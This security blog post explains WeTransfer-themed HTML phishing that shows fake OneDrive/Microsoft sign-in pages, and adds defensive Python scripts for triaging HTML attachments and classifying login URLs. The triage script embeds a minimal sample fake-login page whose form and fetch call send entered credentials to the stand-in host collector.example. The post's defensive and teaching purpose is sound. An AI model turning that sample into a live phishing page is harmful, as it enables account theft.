WeTransfer-themed phishing is currently a common and effective way to compromise Microsoft 365, OneDrive and Outlook accounts, because the flow looks normal: download link, open file, sign in.

In this post I break down a real incident (with the video embedded) and explain what actually happens and why an HTML file can be dangerous even when it looks harmless.

What this attack is about
Attackers deliver an HTML file through a download that looks like a legitimate WeTransfer transfer. When the file is opened it loads in the default browser and renders a fake OneDrive/Microsoft login page. Anything typed into that page is sent to a server the attacker controls.

Why WeTransfer is used so often

WeTransfer is widely used and trusted, so a download that appears to come from it gets more clicks and raises less suspicion than a link to an unknown file-hosting domain. The attacker borrows that reputation instead of building their own.

How the attack unfolds

You receive an email that looks like a notification about shared files, an invoice or other documents. The link opens a download-style page, and instead of a PDF or DOCX you receive a file such as invoice.html or documents.html.

When you open it, your browser shows a convincing OneDrive/Microsoft login. Many people assume it is a normal cloud authentication step and enter their password.

Why the HTML file is the key risk

An HTML file is simply a web page saved as a file. Your browser renders it exactly as it would render a page from the web, JavaScript included, so it can draw a fake login form, redirect you to another site, or send whatever you type to an attacker-controlled server. No macro, exploit or executable is needed; the browser does all the work. That is why "opening a file" can suddenly turn into a credential theft moment.
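To make the point concrete, here is a small triage script for a downloaded .html attachment. It is an added example written for this post, not code from the original incident or from any vendor: it uses only the Python standard library and looks for the building blocks a fake-login file needs (a password field, a form or script that sends input to a non-Microsoft host, a redirect, and obfuscated JavaScript). The MICROSOFT_LOGIN_HOSTS allowlist, the collector.example host and both sample documents are assumptions constructed for the example.

```python
"""Triage a downloaded .html attachment for credential-harvesting behaviour.

Added example (not code from the original post). Stdlib only.
MICROSOFT_LOGIN_HOSTS is an assumed allowlist; the samples are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist of hosts that may legitimately receive a Microsoft 365 sign-in form.
MICROSOFT_LOGIN_HOSTS = {"login.microsoftonline.com", "login.live.com", "login.microsoft.com"}


class _Collector(HTMLParser):
    """Collects form actions, password inputs, meta-refresh tags and inline script text."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.password_fields = 0
        self.meta_refresh = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser already lowercases tag and attribute names
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            self.meta_refresh.append(a.get("content") or "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:  # script bodies arrive here as raw text
            self.scripts.append(data)


def _offsite(url):
    """True when the URL names a host and that host is not a Microsoft sign-in host."""
    host = urlparse(url).hostname
    return host is not None and host.lower() not in MICROSOFT_LOGIN_HOSTS


def triage_html(content):
    """Return human-readable findings; an empty list means nothing notable was seen."""
    p = _Collector()
    p.feed(content)
    p.close()
    findings = []
    if p.password_fields:
        findings.append("password field present")
    for action in p.form_actions:
        if _offsite(action):
            findings.append("form posts to non-Microsoft host: " + urlparse(action).hostname)
    for refresh in p.meta_refresh:
        findings.append("meta refresh redirect: " + refresh)
    js = "\n".join(p.scripts)
    # Decoding helpers and document.write are the usual way kits hide their real URLs.
    if re.search(r"\b(?:atob|unescape|eval)\s*\(", js) or "document.write" in js:
        findings.append("obfuscated or dynamic JavaScript")
    # fetch('https://...') or xhr.open('POST', 'https://...') with an off-site target.
    for m in re.finditer(r"""(?:fetch|\.open)\s*\(\s*(?:['"][A-Za-z]+['"]\s*,\s*)?['"](https?://[^'"\s)]+)""", js):
        if _offsite(m.group(1)):
            findings.append("script sends data to: " + urlparse(m.group(1)).hostname)
    if re.search(r"\blocation(?:\.href)?\s*=[^=]", js):
        findings.append("script redirect")
    return findings


# Constructed sample: a minimal fake "OneDrive" sign-in page of the kind described above.
FAKE_LOGIN = """<!doctype html>
<html><head><title>OneDrive - Sign in</title></head><body>
<h2>Sign in to view the shared documents</h2>
<form method="post" action="https://collector.example/submit">
  <input type="email" name="login" placeholder="Email">
  <input type="password" name="passwd" placeholder="Password">
  <button type="submit">Sign in</button>
</form>
<script>
  var next = atob('aGlkZGVu');   // decodes to "hidden"; real kits hide URLs this way
  document.querySelector('form').addEventListener('submit', function () {
    fetch('https://collector.example/log', {method: 'POST'});
  });
</script>
</body></html>"""

# Constructed benign sample: an HTML document with no form, script or redirect.
PLAIN_DOCUMENT = "<html><body><h1>Quarterly report</h1><p>Figures attached.</p></body></html>"

if __name__ == "__main__":
    for name, doc in (("FAKE_LOGIN", FAKE_LOGIN), ("PLAIN_DOCUMENT", PLAIN_DOCUMENT)):
        print(name, "->", triage_html(doc) or ["clean"])
```

Any finding on a file that arrived as a "document" is enough to stop and verify; the script is deliberately noisy rather than clever, because a downloaded HTML page that asks for a password has no legitimate reason to exist in the first place.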

How to spot it quickly

Check the browser address bar. A login page opened from a downloaded file shows a file:// path (or, after a redirect, a domain that is not Microsoft's); a genuine Microsoft 365 sign-in loads over https from login.microsoftonline.com. Also ask why a "document" arrived as .html rather than a PDF or DOCX. If the message adds urgency ("expires soon", "urgent", "view now"), treat that as a strong warning sign.
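The address-bar check can be written down as a rule set. The classifier below is an added example for this post, not code from the original incident; the MICROSOFT_LOGIN_HOSTS allowlist and the brand-word list are assumptions, and the test URLs use .example hosts. It goes a little beyond the text by also catching the common disguises: a drive path or file:// URL, a lookalike host that embeds the real hostname as a subdomain, the user@host trick, punycode or non-ASCII labels, and plain http.

```python
"""Classify what the address bar shows when a Microsoft-style login appears.

Added example (not code from the original post). MICROSOFT_LOGIN_HOSTS and
BRAND_WORDS are assumed lists; adjust them for your tenant.
"""
from urllib.parse import urlsplit

# Assumed allowlist of genuine Microsoft sign-in hosts.
MICROSOFT_LOGIN_HOSTS = ("login.microsoftonline.com", "login.live.com", "login.microsoft.com")
# Brand words that lookalike hosts borrow to look plausible.
BRAND_WORDS = ("microsoft", "office", "onedrive", "sharepoint", "outlook")


def classify_address(url):
    """Return one of: local_file, userinfo_trick, not_https, idn_host, genuine, lookalike, unknown."""
    url = url.strip()
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    # file:///C:/Users/... or a raw Windows path such as C:\Users\...: the page came from disk.
    if scheme == "file" or len(scheme) == 1:
        return "local_file"
    if not scheme:
        # Modern address bars hide "https://" but never hide "file://", so assume https.
        parts = urlsplit("https://" + url)
        scheme = "https"
    host = (parts.hostname or "").lower()
    # https://login.microsoftonline.com@evil.example/ : the text before @ is userinfo, not the host.
    if parts.username is not None:
        return "userinfo_trick"
    if scheme != "https":
        return "not_https"
    # Punycode or raw non-ASCII labels: a homoglyph of a Microsoft name is the usual reason.
    if "xn--" in host or not host.isascii():
        return "idn_host"
    if host in MICROSOFT_LOGIN_HOSTS:
        return "genuine"
    # login.microsoftonline.com.verify-docs.example or onedrive-share.example: borrowed brand name.
    if any(word in host for word in BRAND_WORDS):
        return "lookalike"
    return "unknown"


if __name__ == "__main__":
    for sample in (
        "file:///C:/Users/me/Downloads/invoice.html",
        "https://login.microsoftonline.com/common/oauth2/v2.0/authorize",
        "https://login.microsoftonline.com.verify-docs.example/",
        "https://login.microsoftonline.com@collector.example/",
    ):
        print(classify_address(sample), "<-", sample)
```

Only "genuine" should ever be followed by typing a password, and even then only when the page was reached from a link you expected. Everything else, including "unknown", means close the tab and open OneDrive or Outlook yourself from a bookmark.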

How to protect your Microsoft 365 account

Enable MFA (Microsoft Authenticator preferred; FIDO2 security keys or passkeys are stronger still, because a phishing kit that relays a password and a one-time code in real time cannot relay a credential that is bound to the genuine domain). Use a password manager: it matches saved logins to the real site, so it will not auto-fill a Microsoft password into a local file or a lookalike domain. Review sign-in logs for unfamiliar locations and devices, and if someone has already entered credentials, reset the password and revoke active sessions. For businesses, turn on Security Defaults or build Conditional Access policies. And teach teams that "HTML file ≠ document".

Video

The embedded video shows the incident flow and what to look for in real life.

Key takeaway: WeTransfer itself isn’t the threat. Attackers use the trusted download flow as camouflage. The danger starts when an HTML file triggers a login prompt.